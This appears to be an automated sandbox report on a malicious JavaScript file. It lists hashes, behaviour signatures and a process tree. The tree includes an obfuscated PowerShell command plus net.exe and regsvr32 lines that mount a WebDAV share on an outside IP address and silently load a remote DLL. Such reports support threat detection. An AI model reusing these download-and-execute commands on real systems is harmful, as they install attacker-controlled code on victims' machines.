Analysis

  • max time kernel
    73s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 10:46

General

  • Target

    7858290454868466.js

  • Size

    657KB

  • MD5

    be15ae9aeaea57daad4f5add8f34e761

  • SHA1

    2bb89396ca958fd150739deda653efa0a649dd87

  • SHA256

    e4a50bc6e27700e1db6abebd5ed70c30d50494afa15fffad3c7501d59c9f652d

  • SHA512

    e6de08b3b30e9a9d87bc210e87aa4ed37954770332f134d9fa35a496202596642acf3d4c5667605b6eaf941306f800c5622c9475c4aa60d4af22b1fad421dc29

  • SSDEEP

    6144:gTJeZYu1ddZ+Yih114+NAn1XlIcsnQw/KvZJ6+j/mQEyJ6+j/mb03pX5:PKPNArAfi1

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\7858290454868466.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADcANAAxADQAMwAwADIAMwA5ADkAMAA5ADQALgBkAGwAbAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\
        3⤵
          PID:2324
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\17414302399094.dll
          3⤵
            PID:2932

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1456-4-0x000007FEF53CE000-0x000007FEF53CF000-memory.dmp

        Filesize

        4KB

      • memory/1456-5-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

        Filesize

        2.9MB

      • memory/1456-6-0x0000000002670000-0x0000000002678000-memory.dmp

        Filesize

        32KB

      • memory/1456-7-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

        Filesize

        9.6MB

      • memory/1456-8-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

        Filesize

        9.6MB

      • memory/1456-10-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

        Filesize

        9.6MB

      • memory/1456-9-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

        Filesize

        9.6MB